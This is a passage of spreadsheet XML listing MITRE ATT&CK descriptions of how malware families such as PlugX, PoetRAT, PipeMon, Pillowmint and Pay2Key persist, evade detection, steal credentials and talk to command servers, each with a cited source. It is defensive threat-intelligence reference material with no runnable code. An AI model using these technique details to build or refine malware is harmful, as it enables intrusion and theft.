    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) mimics filenames from %SYSTEM%\System32 to hide DLLs in %WINDIR% and/or %TEMP%.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has hashed most its code's functions and encrypted payloads with base64 and XOR.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used python scripts.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has been observed using a Registry Run key.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using Rundll32.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather AVs registered in the system.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using the LoadLibrary API.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather system information such as computer names.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) enables remote interaction and can obtain additional code over HTTPS GET and POST requests.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) scrapes memory for properly formatted payment card data.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) aggregates collected data in a tmp file.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) is loaded and executed by a highly obfuscated launcher.(Citation: FireEye Fin8 May 2016)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve lists of files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can upload files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve lists of running processes.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) can perform pass the hash.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has used RSA encrypted communications with C2.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can remove its log file from disk.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has sent its public key to the C2 server over TCP.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can stop the MS SQL service at the end of the encryption process to release files locked by the service.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has the ability to gather the hostname of the victim machine.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can identify the IP and MAC addresses of the compromised host.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can use Cron to create periodic and pre-scheduled background jobs.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute the command code &lt;code&gt;do_upload&lt;/code&gt; to send files to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can delete downloaded executables after running them.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can use the command code &lt;code&gt;do_vslist&lt;/code&gt; to send file names, size, and status to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can remove strings from binaries.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute the command code &lt;code&gt;do_download&lt;/code&gt; to retrieve remote files from C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can add the executable flag to a downloaded file.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) has mimicked the Cron binary to hide itself on compromised systems.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can sniff network traffic to look for packets matching specific conditions.(Citation: Leonardo Turla Penquin May 2020)(Citation: Kaspersky Turla Penquin December 2014)</t>
  </si>
  <si>
    <t>The [Penquin](https://attack.mitre.org/software/S0587) C2 mechanism is based on TCP and UDP packets.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) has encrypted strings in the binary for obfuscation.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can report the file system type and disk space of a compromised host to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can report the IP of the compromised host to attacker controlled infrastructure.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) will connect to C2 only after sniffing a "magic packet" value in TCP or UDP packets matching specific conditions.(Citation: Leonardo Turla Penquin May 2020)(Citation: Kaspersky Turla Penquin December 2014)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute remote commands using bash scripts.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used a malicious shim database to maintain persistence.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has encrypted stolen credit card information with AES and further encoded it with Base64.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used the NtQueueApcThread syscall to inject code into svchost.exe.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has collected credit card data using native API functions.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has been decompressed by included shellcode prior to being launched.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has deleted the filepath &lt;code&gt;%APPDATA%\Intel\devmonsrv.exe&lt;/code&gt;.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) can uninstall the malicious service from an infected machine.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has stored its malicious payload in the registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\DRM&lt;/code&gt;.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used multiple native Windows APIs to execute and conduct process injections.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has been compressed and stored within a registry key. [Pillowmint](https://attack.mitre.org/software/S0517) has also obfuscated the AES key used for encryption.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used a PowerShell script to install a shim database.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) can iterate through running processes every six seconds collecting a list of processes to capture from later.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used shellcode which reads code stored in the registry keys &lt;code&gt;\REGISTRY\SOFTWARE\Microsoft\DRM&lt;/code&gt; using the native Windows API as well as read &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces&lt;/code&gt; as part of its C2.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) steals credentials from compromised hosts. [PinchDuke](https://attack.mitre.org/software/S0048)'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [PinchDuke](https://attack.mitre.org/software/S0048) include ones associated with many sources such as The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, and Microsoft Outlook.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) steals credentials from compromised hosts. [PinchDuke](https://attack.mitre.org/software/S0048)'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [PinchDuke](https://attack.mitre.org/software/S0048) include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) collects user files from the compromised host based on predefined file extensions.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) searches for files created within a certain timeframe and whose file extension matches a predefined list.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) steals credentials from compromised hosts. [PinchDuke](https://attack.mitre.org/software/S0048)'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [PinchDuke](https://attack.mitre.org/software/S0048) include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) gathers system configuration information.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) transfers files from the compromised host via HTTP or HTTPS to a C2 server.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Ping](https://attack.mitre.org/software/S0097) can be used to identify remote systems within a network.(Citation: TechNet Ping)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) installer can use UAC bypass techniques to install the payload.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501), its installer, and tools are signed with stolen code-signing certificates.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can attempt to gain administrative privileges using token impersonation.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can decrypt password-protected executables.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can inject its modules into various processes using reflective DLL loading.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can switch to an alternate C2 domain when a particular date has been reached.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can install additional modules via C2 commands.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) modules are stored on disk with seemingly benign names including use of a file extension associated with a popular word processor.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) has stored its encrypted payload in the Registry.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501)'s first stage has been executed by a call to &lt;code&gt;CreateProcess&lt;/code&gt; with the decryption password in an argument. [PipeMon](https://attack.mitre.org/software/S0501) has used a call to &lt;code&gt;LoadLibrary&lt;/code&gt; to load its installer.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>The [PipeMon](https://attack.mitre.org/software/S0501) communication module can use a custom protocol based on TLS over TCP.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) modules are stored encrypted on disk.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can use parent PID spoofing to elevate privileges.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>Print Processors</t>
  </si>
  <si>
    <t>The [PipeMon](https://attack.mitre.org/software/S0501) installer has modified the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors&lt;/code&gt; to install [PipeMon](https://attack.mitre.org/software/S0501) as a Print Processor.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can iterate over the running processes to find a suitable injection target.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can check for the presence of ESET and Kaspersky security software.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) has used call to &lt;code&gt;LoadLibrary&lt;/code&gt; to load its installer. [PipeMon](https://attack.mitre.org/software/S0501) loads its modules using reflective loading or custom shellcode.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) communications are RC4 encrypted.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can collect and send OS version and computer name as a part of its C2 beacon.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can send time zone information from a compromised host to C2.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can establish persistence by registering a malicious DLL as an alternative Print Processor which is loaded when the print spooler service starts.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) uses DNS as its C2 protocol.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has commands to list drives on the victim machine and to list file information for a given directory.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to upload a file to the victim machine.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) obfuscates files by splitting strings into smaller sub-strings and including "garbage" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) establishes persistence via a Registry Run key.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>Responses from the [Pisloader](https://attack.mitre.org/software/S0124) C2 server are base32-encoded.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to collect victim system information, including the system name and OS version.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to collect the victim's IP address.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has used DLL side-loading to evade anti-virus.(Citation: FireEye Clandestine Fox Part 2)(Citation: Dell TG-3390)(Citation: Stewart 2014)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Palo Alto PlugX June 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use DNS for command and control.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) uses Pastebin to store C2 addresses.(Citation: Palo Alto PlugX June 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to enumerate drives and find files recursively.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to download and execute files on the compromised machine.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module for capturing keystrokes per process including window titles.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>A version of [PlugX](https://attack.mitre.org/software/S0013) loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.(Citation: Palo Alto PlugX June 2017)</t>
  </si>
  <si>
    <t>In one instance, [menuPass](https://attack.mitre.org/groups/G0045) added [PlugX](https://attack.mitre.org/software/S0013) as a service with a display name of "Corel Writing Tools Utility."(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to create, delete, or modify Registry keys.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can use the Windows API function CreateProcess to execute another process.(Citation: Lastline PlugX Analysis)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to enumerate network shares.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use raw TCP or UDP for command and control.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to list the processes running on a machine.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can enumerate and query for information contained within the Windows Registry.(Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) adds Run key entries in the Registry to establish persistence.(Citation: Lastline PlugX Analysis)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) allows the operator to capture screenshots.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) checks if VMware tools is running in the background by searching for any process named "vmtoolsd". (Citation: Unit42 PlugX June 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module for enumerating TCP and UDP network connections and associated processes using the &lt;code&gt;netstat&lt;/code&gt; command.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use HTTP for command and control.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) allows actors to spawn a reverse shell on a victim.(Citation: Dell TG-3390)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be added as a service to establish persistence. [PlugX](https://attack.mitre.org/software/S0013) also has a module to change service configurations as well as start, control, and delete services.(Citation: CIRCL PlugX March 2013)(Citation: Lastline PlugX Analysis)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to compress files with zip.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt command and control (C2) communications.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used file system monitoring to track modification and enable automatic exfiltration.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has executed a Lua script through a Lua interpreter for Windows.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Browdec.exe to steal browser credentials.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used LZMA and base64 libraries to decode obfuscated scripts.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was delivered with documents using DDE to execute malicious code.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a .NET tool named dog.exe to exiltrate information over an e-mail account.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has exfiltrated data over the C2 channel.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used [FTP](https://attack.mitre.org/software/S0095) for exfiltration.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used FTP for C2 communications.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list files upon receiving the &lt;code&gt;ls&lt;/code&gt; command from C2.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to hide and unhide files.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to overwrite scripts and delete itself if a sandbox environment is detected.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named klog.exe for keylogging.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used voStro.exe, a compiled pypykatz (Python version of [Mimikatz](https://attack.mitre.org/software/S0002)), to steal credentials.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used spearphishing attachments to infect victims.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has made registry modifications to alter its behavior upon execution.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt communications over port 143(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a custom encryption scheme for communication between scripts and pyminifier to obfuscate scripts.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list all running processes.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has added a registry key in the &lt;RUN&gt; hive for persistence.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used Nmap for remote system discovery.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to take screen captures.(Citation: Talos PoetRAT April 2020)(Citation: Dragos Threat Report 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was distributed via malicious Word documents.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of "License.txt" and exiting.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to gather information about the compromised host.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) sent username, computer name, and the previously generated UUID in reply to a "who" command from C2.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Bewmac to record the webcam on compromised hosts.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used Word documents with VBScripts to execute malicious activities.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used HTTP and HTTPs for C2 communications.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has called cmd through a Word document macro.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>Active Setup</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry key in the Active Setup pointing to a malicious executable.(Citation: Microsoft PoisonIvy 2017)(Citation: paloalto Tropic Trooper 2016)(Citation: FireEye Regsvr32 Targeting Mongolian Gov)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) captures window titles.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can steal system information.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) can inject a malicious DLL into a process.(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can upload files.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
